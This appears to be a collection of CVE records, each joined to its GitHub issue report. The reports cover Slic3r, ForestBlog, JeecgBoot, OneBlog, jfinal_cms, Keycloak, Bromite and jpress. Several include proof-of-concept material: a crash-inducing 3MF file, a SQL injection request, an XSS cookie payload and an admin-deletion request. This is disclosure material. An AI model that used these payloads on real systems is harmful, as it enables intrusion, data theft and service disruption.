[ "Issue Tracking", "Mitigation", "Patch", "Third Party Advisory" ]
github.com
[ "slic3r", "Slic3r" ]
### Summary A crafted 3MF XML document can cause a crash due to a NULL pointer dereference during parsing. ### Vulnerable versions * Slic3r (commit b1a5500f427700ac3dffc0e7d9535ea65f993537) ### Step to reproduce 1. Create the proof-of-concept OBJ file (`3dmodel.3dmodel`): ```xml <model> <resources> <object id="1"> <mesh> <vertices> <slic3r:volume /> </vertices> </mesh> </object> </resources> </model> ``` 2. Pack the file into a zip archive together with the prerequisite other files from a 3mf file: ``` 3D/3dmodel.3dmodel rels/.rels [Content_Types].xml ``` 3. Rename the zip archive to `nullptr_3mf_volume.3mf` 4. Execute `slic3r --info nullptr_3mf_volume.3mf` 5. Observe segmentation fault. ### Example file [nullptr_3mf_volume.zip](https://github.com/slic3r/Slic3r/files/7777550/nullptr_3mf_volume.zip) ### Cause `get_attribute()` in TMF.cpp returns NULL if the sought attribute is missing. The constructor of `std::string` is invoked implicitly, leading to a crash (`std::string(NULL)`). The check at [TMF.cpp:602](https://github.com/slic3r/Slic3r/blob/b1a5500f427700ac3dffc0e7d9535ea65f993537/xs/src/libslic3r/IO/TMF.cpp#L602) is ineffective, since it occurs after the NULL pointer is dereferenced. ### Impact Denial of Service. ### Proposed mitigation Perform a NULL check on the return values from `get_attribute` before constructing strings from them. Ensure that the NULL check terminates parsing, as proposed in #5118 and #5119.
NULL pointer dereference in 3MF XML parser (slic3r:volume tag without ts/te/modifier attribute)
https://api.github.com/repos/slic3r/Slic3r/issues/5120/comments
2
2021-12-26T20:44:57Z
2022-01-31T12:46:34Z
https://github.com/slic3r/Slic3r/issues/5120
1,088,841,969
5,120
3,102
CVE-2021-46033
2022-01-25T15:15:08.160
In ForestBlog, as of 2021-12-28, File upload can bypass verification.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/saysky/ForestBlog/issues/69" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/saysky/ForestBlog/issues/69" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:forestblog_project:forestblog:-:*:*:*:*:*:*:*", "matchCriteriaId": "09674756-CCE5-44F4-9CEA-FEFB96615FA7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/saysky/ForestBlog/issues/69
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "saysky", "ForestBlog" ]
In this code, the verification suffix should verify the file type after the last point: public final String allowSuffix = ".bmp.jpg.jpeg.png.gif.pdf.doc.zip.rar.gz"; /** * 上传文件 * * @param file * @return * @throws IOException */ @RequestMapping(value = "/img", method = RequestMethod.POST) public JsonResult uploadFile(@RequestParam("file") MultipartFile file) { //1.文件后缀过滤,只允许部分后缀 //文件的完整名称,如spring.jpeg String filename = file.getOriginalFilename(); //文件名,如spring String name = filename.substring(0, filename.indexOf(".")); //文件后缀,如.jpeg String suffix = filename.substring(filename.lastIndexOf(".")); if (allowSuffix.indexOf(suffix) == -1) { return new JsonResult().fail("不允许上传该后缀的文件!"); } example: ![1640676827(1)](https://user-images.githubusercontent.com/92918668/147540850-f4c12247-cf64-4ed7-bd04-49a85af08ba7.jpg) ![image](https://user-images.githubusercontent.com/92918668/147540903-b00edbe2-6267-4866-9dc4-7f0bc82f337a.png)
File upload bypass exists
https://api.github.com/repos/saysky/ForestBlog/issues/69/comments
0
2021-12-28T07:42:20Z
2022-02-17T05:00:26Z
https://github.com/saysky/ForestBlog/issues/69
1,089,678,713
69
3,103
CVE-2021-46089
2022-01-25T15:15:08.203
In JeecgBoot 3.0, there is a SQL injection vulnerability that can operate the database with root privileges.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/3331" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/3331" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "45720048-60C0-4FA8-AA09-16C8CF329FD3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/jeecgboot/jeecg-boot/issues/3331
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### version: <=3.0 ##### precondition: After logged in the website,click 流程管理 proxy burp,the parameter "column" can be made SQL injection. ##### Screenshot & code : <img width="1240" alt="图片" src="https://user-images.githubusercontent.com/25843151/147641725-71a3c7a3-c4d4-41f8-af76-b875641e2cbf.png"> poc: ```GET /act/process/extActExpression/list?_t=1637890565&column=extractvalue(1,concat(char(126),user()))&order=desc&field=id,,,name,expression,action&pageNo=1&pageSize=10 HTTP/1.1 Host: api.boot.jeecg.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Sign: 7AE7A7990565A3187D8CE30725C82718 X-Timestamp: 20211229152402 X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDA3NjI2NTMsInVzZXJuYW1lIjoiamVlY2cifQ.SX0HjEOmrGFDZt-oNUUOlTNYn9ftCOmhQIOgED9HZRM Tenant-Id: 2 Origin: http://boot.jeecg.com Referer: http://boot.jeecg.com/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Te: trailers Connection: close ```
There is an SQL injection vulnerability that can operate the database with root privileges.
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/3331/comments
3
2021-12-29T08:36:51Z
2022-01-21T02:04:30Z
https://github.com/jeecgboot/JeecgBoot/issues/3331
1,090,357,318
3,331
3,104
CVE-2021-46034
2022-01-25T16:15:08.797
A problem was found in ForestBlog, as of 2021-12-29, there is a XSS vulnerability that can be injected through the nickname input box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/saysky/ForestBlog/issues/70" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/saysky/ForestBlog/issues/70" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:forestblog_project:forestblog:-:*:*:*:*:*:*:*", "matchCriteriaId": "09674756-CCE5-44F4-9CEA-FEFB96615FA7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/saysky/ForestBlog/issues/70
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "saysky", "ForestBlog" ]
There is no character verification for the nickname of the registration interface ![1640761829(1)](https://user-images.githubusercontent.com/92918668/147636720-189126a2-1b8b-4888-93dc-803d71e69c5e.jpg) The administrator clicks the user function to pop up the XSS prompt box ![image](https://user-images.githubusercontent.com/92918668/147636781-e03abee1-e3c2-400b-b2e5-b0b67635a418.png)
XSS vulnerability exists
https://api.github.com/repos/saysky/ForestBlog/issues/70/comments
0
2021-12-29T07:16:11Z
2022-02-17T05:00:14Z
https://github.com/saysky/ForestBlog/issues/70
1,090,318,764
70
3,105
CVE-2021-46085
2022-01-25T16:15:08.920
OneBlog <= 2.2.8 is vulnerable to Insecure Permissions. Low level administrators can delete high-level administrators beyond their authority.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zhangyd-c/OneBlog/issues/29" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zhangyd-c/OneBlog/issues/29" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oneblog_project:oneblog:*:*:*:*:*:*:*:*", "matchCriteriaId": "5E0AB4B0-7F87-4DE4-9789-C27A8220F2E5", "versionEndExcluding": null, "versionEndIncluding": "2.2.8", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "276" ]
276
https://github.com/zhangyd-c/OneBlog/issues/29
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "zhangyd-c", "OneBlog" ]
[Suggested description] Insecure Permissions vulnerability exists in OneBlog.Low level administrators can delete high-level administrators beyond their authority (including administrators with the highest authority). [Vulnerability Type] Insecure Permissions [Vendor of Product] https://github.com/zhangyd-c/OneBlog [Affected Product Code Base] <= 2.2.8 [Affected Component] POST /user/remove HTTP/1.1 Host: localhost:8086 Content-Length: 5 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" Accept: */* X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost:8086 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:8086/users Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: navUrl=http://localhost:9105/admin/basic.action; XSRF-TOKEN=010353a5-cfe1-4fa8-9a28-0b9cfb4ca538; cms_token=c820882773ab4b6b9719916981b3e9b7; JSESSIONID=c45212ed-03a9-499c-810b-cf5c28e4d5b1 Connection: close ids= 3(The IDS value is controllable. Any administrator can add, delete, modify and query the data of other administrator users by modifying the IDS value) [Attack Type] Remote [Vulnerability details] first, prepare two test accounts with different levels. Senior administrator admin ![image-20211229164244458](https://user-images.githubusercontent.com/85676107/147647201-cb54a0f2-34fc-4938-9352-7815d636b146.png) Low level administrator root123 ![image-20211229164427567](https://user-images.githubusercontent.com/85676107/147647235-bcfc9ef7-e75a-44ed-a219-402b3be9b9e6.png) Step 2: log in to the system with root123 and enter the user management page ![image-20211229165138189](https://user-images.githubusercontent.com/85676107/147647266-38957220-6a81-415c-8828-214ebd5634ea.png) Step 3: click the delete button to directly delete the administrator user admin ![image-20211229165336565](https://user-images.githubusercontent.com/85676107/147647301-53cb95a1-bf48-4548-8cd8-13cf145d418c.png) Delete succeeded! In addition, you can also use burpsuite to capture packets and delete any user (including yourself) by modifying the value of ids. This is a logical vulnerability because the default secondary rule of the system is that you cannot delete yourself) The first step is to log in to the background with root123 account and enter user management. ![image-20211229170717287](https://user-images.githubusercontent.com/85676107/147647380-54f14326-4d6f-405e-8bc4-61056c226bc2.png) Step 2: after the packet capturing mode is enabled, click the delete button corresponding to user test ![image-20211229171345364](https://user-images.githubusercontent.com/85676107/147647418-1a45d433-45c9-4b78-bc67-e087db3c9f48.png) You can delete any user by modifying the value of IDS. Here, I modify the value of IDS to the value of the currently logged in user. ![image-20211229171533787](https://user-images.githubusercontent.com/85676107/147647670-1431abf2-b905-421e-a1f7-c683bc3cabd4.png) Delete succeeded!
There is a Insecure Permissions vulnerability exists in OneBlog <= 2.2.8
https://api.github.com/repos/zhangyd-c/OneBlog/issues/29/comments
0
2021-12-29T09:33:16Z
2021-12-29T09:33:16Z
https://github.com/zhangyd-c/OneBlog/issues/29
1,090,388,202
29
3,106
CVE-2021-46087
2022-01-25T16:15:09.013
In jfinal_cms >= 5.1 0, there is a storage XSS vulnerability in the background system of CMS. Because developers do not filter the parameters submitted by the user input form, any user with background permission can affect the system security by entering malicious code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/19" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/19" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EF2DC8E-81C2-4E53-A709-EC9490E00A3F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.1.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jflyfox/jfinal_cms/issues/19
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
There is a storage XSS vulnerability in the modification of jfinal_CMS user's personal information. The attacker can insert malicious XSS code into the modification of personal information, and then successfully trigger XSS attack when the administrator user views the user's personal information. First, register a user test, then enter the personal information page, insert the malicious XSS attack code in the remarks: payload: `"><img src=x onerror=alert(document.cookie);><"` ![image](https://user-images.githubusercontent.com/38161463/83648691-ed45ed00-a5e8-11ea-97dc-73ad0ef6701c.png) Then use the administrator account to view the user information: ![image](https://user-images.githubusercontent.com/38161463/83648793-10709c80-a5e9-11ea-9ebe-3d89fe74520c.png) Successfully triggered malicious XSS Code: ![image](https://user-images.githubusercontent.com/38161463/83648860-21b9a900-a5e9-11ea-9491-da5c57b8c670.png) Safety advice: strictly filter the user's input
A Stored XSS vulnerability exists in jfinal_cms v5.1.0
https://api.github.com/repos/jflyfox/jfinal_cms/issues/19/comments
1
2020-06-03T14:27:59Z
2021-06-15T03:31:10Z
https://github.com/jflyfox/jfinal_cms/issues/19
630,044,323
19
3,107
CVE-2021-4133
2022-01-25T20:15:08.607
A flaw was found in Keycloak in versions from 12.0.0 and before 15.1.1 which allows an attacker with any existing user account to create new default user accounts via the administrative REST API even when new user registration is disabled.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2033602" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/keycloak/keycloak/issues/9247" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/keycloak/keycloak/security/advisories/GHSA-83x4-9cwr-5487" }, { "source": "secalert@redhat.com", "tags": [ "Not Applicable" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2033602" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/keycloak/keycloak/issues/9247" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/keycloak/keycloak/security/advisories/GHSA-83x4-9cwr-5487" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*", "matchCriteriaId": "A401BE6A-3227-4F4D-9FA8-35B61B86B79A", "versionEndExcluding": "15.1.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "12.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/keycloak/keycloak/issues/9247
[ "Third Party Advisory" ]
github.com
[ "keycloak", "keycloak" ]
### Describe the bug A incorrect authorization flaw was found in Keycloak 12.0.0, the flaw allows an attacker with any existing user account to create new default user accounts via the administrative REST API even where new user registration is disabled. Security advisory: * https://github.com/keycloak/keycloak/security/advisories/GHSA-83x4-9cwr-5487 ### Version 12.0.0 up to and including 15.0.0
Incorrect authorization allows unpriviledged users to create other users
https://api.github.com/repos/keycloak/keycloak/issues/9247/comments
3
2021-12-20T12:37:38Z
2022-09-11T18:42:20Z
https://github.com/keycloak/keycloak/issues/9247
1,084,743,912
9,247
3,108
CVE-2019-25056
2022-01-26T05:15:08.847
In Bromite through 78.0.3904.130, there are adblock rules in the release APK; therefore, probing which resources are blocked and which aren't can identify the application version and defeat the User-Agent protection mechanism.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/bromite/bromite/issues/2#issuecomment-524102774" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/bromite/bromite/issues/2#issuecomment-524102774" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bromite:bromite:*:*:*:*:*:*:*:*", "matchCriteriaId": "9364A5D1-99E3-4529-9B05-5B4A8B832070", "versionEndExcluding": null, "versionEndIncluding": "78.0.3904.130", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/bromite/bromite/issues/2#issuecomment-524102774
[ "Third Party Advisory" ]
github.com
[ "bromite", "bromite" ]
This issue composes of multiple parts: * ~~a new tab/UI to manage the adblocking feature~~ will not implement this * logic to download the adblock filters and store them * logic to parse the adblock filters (or an intermediate format) * users can of course customize where the adblock filters come from (URLs) The projects we could look at are adBlock and uBlock origin and other browsers that implement such functionality.
Support user-specified adblock filters
https://api.github.com/repos/bromite/bromite/issues/2/comments
39
2017-10-11T14:19:01Z
2024-01-11T18:34:59Z
https://github.com/bromite/bromite/issues/2
264,605,079
2
3,109
CVE-2021-46117
2022-01-26T16:15:07.613
jpress 4.2.0 is vulnerable to remote code execution via io.jpress.module.page.PageNotifyKit#doSendEmail. The admin panel provides a function through which attackers can edit the email templates and inject some malicious code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://jpress.com" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/JPressProjects/jpress" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/171" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://jpress.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/JPressProjects/jpress" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/171" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpress:jpress:4.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "D2D7F379-C6D9-46F8-BD79-2512DE8F4784", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/JPressProjects/jpress/issues/171
[ "Exploit", "Third Party Advisory" ]
github.com
[ "JPressProjects", "jpress" ]
